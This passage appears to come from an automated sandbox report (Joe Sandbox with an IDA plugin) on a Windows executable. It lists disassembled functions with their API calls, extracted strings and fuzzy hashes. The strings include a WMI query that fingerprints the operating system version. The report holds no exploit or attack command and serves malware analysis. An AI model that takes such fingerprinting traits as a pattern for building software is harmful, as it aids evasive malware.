                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 4586db35ed1ad9fe94f8e711b7c8a836c13938ea461272abfb3553b590968822
                                                            • Instruction ID: d30b35e7b571a745a23851c53e97eab11b6459960e47827b0671df8d83040018
                                                            • Opcode Fuzzy Hash: 4586db35ed1ad9fe94f8e711b7c8a836c13938ea461272abfb3553b590968822
                                                            • Instruction Fuzzy Hash: F8D1D4B1A083458FDB14CF28C84475FBFE5BF89308F08496DE8899B282D774EA55CB56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 478f2c8dd5c9289f4ad0cb8710e638d6e1a24da7f57e0ef2423c373be98215d3
                                                            • Instruction ID: a563c967631d7b322f40d4dd4344e1b37270e08a3747666698b38d83c3ae36c4
                                                            • Opcode Fuzzy Hash: 478f2c8dd5c9289f4ad0cb8710e638d6e1a24da7f57e0ef2423c373be98215d3
                                                            • Instruction Fuzzy Hash: 62E12A755083949FC304CF69D89086BBFF0AFAA300F45495EF9D497352C235EA19DBA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction ID: 037b6f2f874d6901d37c09156e86ebed79ade6b9492178f3e3b90ed0a11b9b93
                                                            • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                            • Instruction Fuzzy Hash: 099158F020034A9BDB24EE64D895BFE7BD5FB90304F100D2DF79A872C2EA649595CB52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction ID: 2f3db365d7366001111a8c954e9ddab0d3ea2695321d1970a21b03b99942d4f1
                                                            • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                            • Instruction Fuzzy Hash: 45813DF13043465BDF24DE68C891BBD3BD4BB94304F040D2EEB8A8B1C2DA7499858B56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 735d5049a86679d11ea98246f7e7738b5bf0c447c71f194a393bd6a0811f46e5
                                                            • Instruction ID: e5254b1cbc9837459bcef13bd7c8cb8610b8bb5c3c66769f2b27ca21e57c1681
                                                            • Opcode Fuzzy Hash: 735d5049a86679d11ea98246f7e7738b5bf0c447c71f194a393bd6a0811f46e5
                                                            • Instruction Fuzzy Hash: 5761583A600F09D6FE345968A899BFE2F94FBC1340F540D1AE563DF281F2B19DC28611
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction ID: 3bb00bf28e72fc3f282b5abe32c161bbeb22813bc97a9b0c2756b051bda9abbc
                                                            • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                            • Instruction Fuzzy Hash: 47513425604E45E7FB3545A8845EBFE2F85BBC6300F185819E882DB382F635EEC6C791
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2f98b8ce58dbfecf7a525dc5bf5ead8c9d031ade68ade164bab42fd7a2463d9
                                                            • Instruction ID: 4c9e18d8e24f53729e5d2ac2d5895dcf0a8010e18107c3b00d7b5a1004921d93
                                                            • Opcode Fuzzy Hash: d2f98b8ce58dbfecf7a525dc5bf5ead8c9d031ade68ade164bab42fd7a2463d9
                                                            • Instruction Fuzzy Hash: 7651E4315083D98FD702CF25C28047EBFE0AE9A714F4909AEE5D95B243C234DA4ECB66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25017db78002d72d7939f0d3a6db249f34ad7c0d3980c63fcb72745ea490512f
                                                            • Instruction ID: bf6f487791feb75b71c76ffa5da792dc93855bdaedb8946435187792ae3575d6
                                                            • Opcode Fuzzy Hash: 25017db78002d72d7939f0d3a6db249f34ad7c0d3980c63fcb72745ea490512f
                                                            • Instruction Fuzzy Hash: 1751E0B1A087119FC748CF19D48065AFBE1FF88314F058A2EE899E3341D734EA59CB96
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: c5390f84f50b05a1e94b216f285fd85f003c2b18ad9055e525ec995fbfe83777
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: EF31E6B1A147468FCB14DF15C85126EBFE4FB95304F10452DE589C7381C778EA1ACB92
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 004FE30E
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                              • Part of subcall function 00501DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00531030,00000200,004FD928,00000000,?,00000050,00531030), ref: 00501DC4
                                                            • _strlen.LIBCMT ref: 004FE32F
                                                            • SetDlgItemTextW.USER32(?,0052E274,?), ref: 004FE38F
                                                            • GetWindowRect.USER32(?,?), ref: 004FE3C9
                                                            • GetClientRect.USER32(?,?), ref: 004FE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004FE475
                                                            • GetWindowRect.USER32(?,?), ref: 004FE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 004FE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 004FE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 004FE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 004FE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 004FE58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d$tR
                                                            • API String ID: 2407758923-1265446455
                                                            • Opcode ID: 867f311aa0615ae55692e478fa9a59e7b9b35ad2f659301f50099b274c90b8e0
                                                            • Instruction ID: b3eb1d78ea6202f8bf80de04b09882b2d3e4045baf302e479de85de36dc92b0c
                                                            • Opcode Fuzzy Hash: 867f311aa0615ae55692e478fa9a59e7b9b35ad2f659301f50099b274c90b8e0
                                                            • Instruction Fuzzy Hash: 4D818071508305AFD710DFB9CD89A6FBBE9EB89705F04091DFA8497250D634E909CB52
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0051CB66
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C71E
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C730
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C742
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C754
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C766
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C778
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C78A
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C79C
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7AE
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7C0
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7D2
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7E4
                                                              • Part of subcall function 0051C701: _free.LIBCMT ref: 0051C7F6
                                                            • _free.LIBCMT ref: 0051CB5B
                                                              • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?), ref: 00518DE2
                                                              • Part of subcall function 00518DCC: GetLastError.KERNEL32(?,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?,?), ref: 00518DF4
                                                            • _free.LIBCMT ref: 0051CB7D
                                                            • _free.LIBCMT ref: 0051CB92
                                                            • _free.LIBCMT ref: 0051CB9D
                                                            • _free.LIBCMT ref: 0051CBBF
                                                            • _free.LIBCMT ref: 0051CBD2
                                                            • _free.LIBCMT ref: 0051CBE0
                                                            • _free.LIBCMT ref: 0051CBEB
                                                            • _free.LIBCMT ref: 0051CC23
                                                            • _free.LIBCMT ref: 0051CC2A
                                                            • _free.LIBCMT ref: 0051CC47
                                                            • _free.LIBCMT ref: 0051CC5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID: hR
                                                            • API String ID: 161543041-4218471423
                                                            • Opcode ID: 79b5d5f252846e5cc86771986762b0a02dfb3053a1e04693482cbf6a2bd4b028
                                                            • Instruction ID: 415bbc1877f1337bff79009da02c1c0f39978b03094ec69a54261b68b17bb876
                                                            • Opcode Fuzzy Hash: 79b5d5f252846e5cc86771986762b0a02dfb3053a1e04693482cbf6a2bd4b028
                                                            • Instruction Fuzzy Hash: DF313C316443069FFB30AA78E84ABAA7FE9BF50314F505819E158D6191DF36ECC0CA50
                                                            APIs
                                                            • _free.LIBCMT ref: 00519705
                                                              • Part of subcall function 00518DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?), ref: 00518DE2
                                                              • Part of subcall function 00518DCC: GetLastError.KERNEL32(?,?,0051C896,?,00000000,?,00000000,?,0051C8BD,?,00000007,?,?,0051CCBA,?,?), ref: 00518DF4
                                                            • _free.LIBCMT ref: 00519711
                                                            • _free.LIBCMT ref: 0051971C
                                                            • _free.LIBCMT ref: 00519727
                                                            • _free.LIBCMT ref: 00519732
                                                            • _free.LIBCMT ref: 0051973D
                                                            • _free.LIBCMT ref: 00519748
                                                            • _free.LIBCMT ref: 00519753
                                                            • _free.LIBCMT ref: 0051975E
                                                            • _free.LIBCMT ref: 0051976C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID: 0dR
                                                            • API String ID: 776569668-1608426233
                                                            • Opcode ID: ae96da6894417aff9f9698a04d5eeef1a8927cb4d8b7b386b7c1af87a2e37f3e
                                                            • Instruction ID: be76eb812a4c4a640ea1b75761303fab925d4046665574d0c1c599661c90a431
                                                            • Opcode Fuzzy Hash: ae96da6894417aff9f9698a04d5eeef1a8927cb4d8b7b386b7c1af87a2e37f3e
                                                            • Instruction Fuzzy Hash: 9C11D77510020AAFDB11EF54D846CED3FB5FF54350B1158A4FA084F162DF31EA909B84
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00509736
                                                            • _wcslen.LIBCMT ref: 005097D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 005097E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00509806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0050982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: FjunP$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-3750104276
                                                            • Opcode ID: e14ff3ae204c6596b2cf0294c05a0b36bd0f701fbaed67d3160c01bdc0631ca4
                                                            • Instruction ID: ccbc5d61da54f8aa80344259d7838fdc97d15cdab7414af594767f9c8a60c4cc
                                                            • Opcode Fuzzy Hash: e14ff3ae204c6596b2cf0294c05a0b36bd0f701fbaed67d3160c01bdc0631ca4
                                                            • Instruction Fuzzy Hash: 863125322087127AE725AB349C0AFAF7FACFF93310F14011DF501961D6EB649A4987A6
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 0050D6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 0050D6ED
                                                              • Part of subcall function 00501FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,004FC116,00000000,.exe,?,?,00000800,?,?,?,00508E3C), ref: 00501FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0050D709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0050D720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0050D734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0050D75D
                                                            • DeleteObject.GDI32(00000000), ref: 0050D764
                                                            • GetWindow.USER32(00000000,00000002), ref: 0050D76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: 03e5fcc18d53fafbc91d1aef5a7e01d5508a8b5f3fd703c80f4ddcd022e255a6
                                                            • Instruction ID: 74abc8fe6e03e0fe61b80f6c0cc64ea4f6bb2fb9c5d7342a4013405e0a555f34
                                                            • Opcode Fuzzy Hash: 03e5fcc18d53fafbc91d1aef5a7e01d5508a8b5f3fd703c80f4ddcd022e255a6
                                                            • Instruction Fuzzy Hash: 441106725407117BE7216BB09C4EFAF7E6CFF94792F004110FA45A20E2DA658F0996B5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: 0f618735e7c67c9a9236492dcf1f485876e614f06d16fb3fea7858cca0494c35
                                                            • Instruction ID: 3152cfaef0b4d561c7d455ccbe174640e7d3fb434ad0dcccae6549e4fb67fad8
                                                            • Opcode Fuzzy Hash: 0f618735e7c67c9a9236492dcf1f485876e614f06d16fb3fea7858cca0494c35
                                                            • Instruction Fuzzy Hash: 47B17B7580020AEFEF25DFA4C8999EEBFB6FF44310F144559E8016B212D771DAA2CB91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nP
                                                            • API String ID: 3519838083-2564686854
                                                            • Opcode ID: 3886946e061c50aa611ebb22e4ece27c6866047247c72131d0ca507b4c8de04c
                                                            • Instruction ID: bd633dc264ff63d6f8c853e574fd0493b7e0114e85a9ce4b5d33d189d3e98c16
                                                            • Opcode Fuzzy Hash: 3886946e061c50aa611ebb22e4ece27c6866047247c72131d0ca507b4c8de04c
